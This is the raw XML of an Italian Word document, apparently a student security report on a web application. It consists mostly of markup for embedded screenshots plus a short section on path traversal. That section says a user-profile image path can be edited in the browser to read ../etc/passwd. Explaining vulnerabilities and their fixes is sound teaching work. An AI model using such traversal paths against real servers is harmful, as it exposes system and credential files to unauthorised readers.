            <wp:extent cx="7295717" cy="36892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5717" cy="368920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B4AD84" w14:textId="1BED2D72" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0E112378" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00467BBC"/>
    <w:p w14:paraId="00836BB9" w14:textId="25590EC3" w:rsidR="001A57CF" w:rsidRDefault="00926F16" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Fixed: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE8B8F6" w14:textId="6799483B" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16009D86" wp14:editId="180B8C8F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>821690</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-624840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4469130" cy="1483074"/>
            <wp:effectExtent l="0" t="0" r="7620" b="317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9130" cy="1483074"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="310CC990" w14:textId="31FB1C04" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7A01B73F" w14:textId="2E605149" w:rsidR="00926F16" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00EE2C14" wp14:editId="088CC305">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-236855</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>328295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6579616" cy="2562108"/>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9616" cy="2562108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2E724" w14:textId="10A1E87A" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="268E94E6" w14:textId="772E1C33" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="74B40A71" w14:textId="1534F7CE" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="664B7DAB" w14:textId="59B4B1B6" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7EA0A956" w14:textId="135D0B27" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="06BD5273" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="248BA531" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="54B87073" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2343ED60" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="19199977" w14:textId="02168D3E" w:rsidR="00D12C9A" w:rsidRPr="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB78A7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Path traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17321F5A" w14:textId="77777777" w:rsidR="001A57CF" w:rsidRDefault="001A57CF" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B560894" w14:textId="2D46FBAE" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>L’obiettivo di questo attacco è quello di accedere tramite variabili che referenziano dei file a cartelle o file che stanno al di fuori della cartella base del sito. Piu precisamente, si può accedere al file system, andando a scoprire informazioni sensibili o modificando file di configurazione del sistema, sia usando la notazione ../ che usando percorsi assoluti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A18A8D" w14:textId="77777777" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D23855" w14:textId="73968B5B" w:rsidR="00EB78A7" w:rsidRDefault="002F292A" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo caso, è</w:t>
      </w:r>
      <w:r w:rsidR="00071E32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB78A7">
        <w:t xml:space="preserve">stata aggiunta un’immagine del </w:t>
      </w:r>
      <w:r w:rsidR="00071E32">
        <w:t>profilo dell’utente, che si può modificare dal browser mettendo un altro path e leggendo il file con le password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> salvate sul sistema in ../etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E9883" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1244260B" w14:textId="6E3AA4DD" w:rsidR="00071E32" w:rsidRPr="00370316" w:rsidRDefault="00071E32" w:rsidP="00370316">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071E32">
        <w:t xml:space="preserve">UserController.java: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C862587" w14:textId="1EB6B9B6" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="002F292A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273795E4" w14:textId="62FF35EF" w:rsidR="002F292A" w:rsidRPr="002F292A" w:rsidRDefault="00370316" w:rsidP="002F292A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AD2CCCF" wp14:editId="73C50237">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5614035" cy="1769110"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="120253343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4035" cy="1769110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A1B0E1" w14:textId="77777777" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEBDDA9" w14:textId="6B7326F9" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C7EFCC" w14:textId="5E1000E2" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD3C71F" w14:textId="3830D3AF" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1BC650" w14:textId="4B872E76" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E326C8" w14:textId="77777777" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB62678" w14:textId="5B226D95" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7437F693" w14:textId="286AF5BC" w:rsidR="00071E32" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071E32">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1214897D" wp14:editId="501CF3D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-503555</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5539740" cy="4465320"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="157348557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9740" cy="4465320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="693DFF6E" w14:textId="3F5FC2D1" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709111F5" w14:textId="0F223FB1" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0335762F" w14:textId="08C484D4" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B6673D" w14:textId="759DC082" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CE9658" w14:textId="0BBA35B8" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEC9B4A" w14:textId="4E77942F" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369D80B1" w14:textId="6B1E8023" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7756F2F1" w14:textId="3A4ACB3A" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D3702D" w14:textId="2D5AAE59" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C75569E" w14:textId="58F00F0D" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692B427D" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AFBC6C4" w14:textId="1670135E" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D88CB30" w14:textId="16704BC6" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DBAFDCD" w14:textId="1F817634" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA54D0D" w14:textId="14D130D5" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2D8E52" w14:textId="3CA2A600" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37DF9500" w14:textId="42B3AF76" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA11E0C" w14:textId="406E836A" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1C3C11" w14:textId="45EA82C5" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00370316">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SignUp.jsx: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504F1411" w14:textId="6AB442A3" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="291D957C" wp14:editId="62E0F762">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10304</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3009608" cy="3787428"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="57688161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9608" cy="3787428"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F9F1B4" w14:textId="77777777" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59ADC8FD" w14:textId="77777777" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26395F37" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51268AB4" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E975EF" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB57654" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045CB198" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CEB285" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2BD38E" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765297A4" w14:textId="77777777" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A3E6B0" w14:textId="77777777" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396D5361" w14:textId="77777777" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6831CC88" w14:textId="6F452B92" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2175434A" w14:textId="41510A19" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F1AC76" w14:textId="4C87C0A2" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A9F39CE" w14:textId="52561F72" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45018D20" w14:textId="77777777" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D8B6772" w14:textId="77777777" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458C9070" w14:textId="5757470E" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>AccountUser</w:t>
      </w:r>
      <w:r w:rsidR="00370316">
        <w:t>.jsx</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ABDDC7" w14:textId="4221EEC8" w:rsidR="00071E32" w:rsidRPr="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A22B34C" w14:textId="490568A3" w:rsidR="00071E32" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="404C6055" wp14:editId="6C668F88">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-574040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4634865" cy="1253267"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="197972850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4865" cy="1253267"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD0336D" w14:textId="01FA9191" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3564737A" w14:textId="45BA31BA" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F329E0" w14:textId="2DBE40B3" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
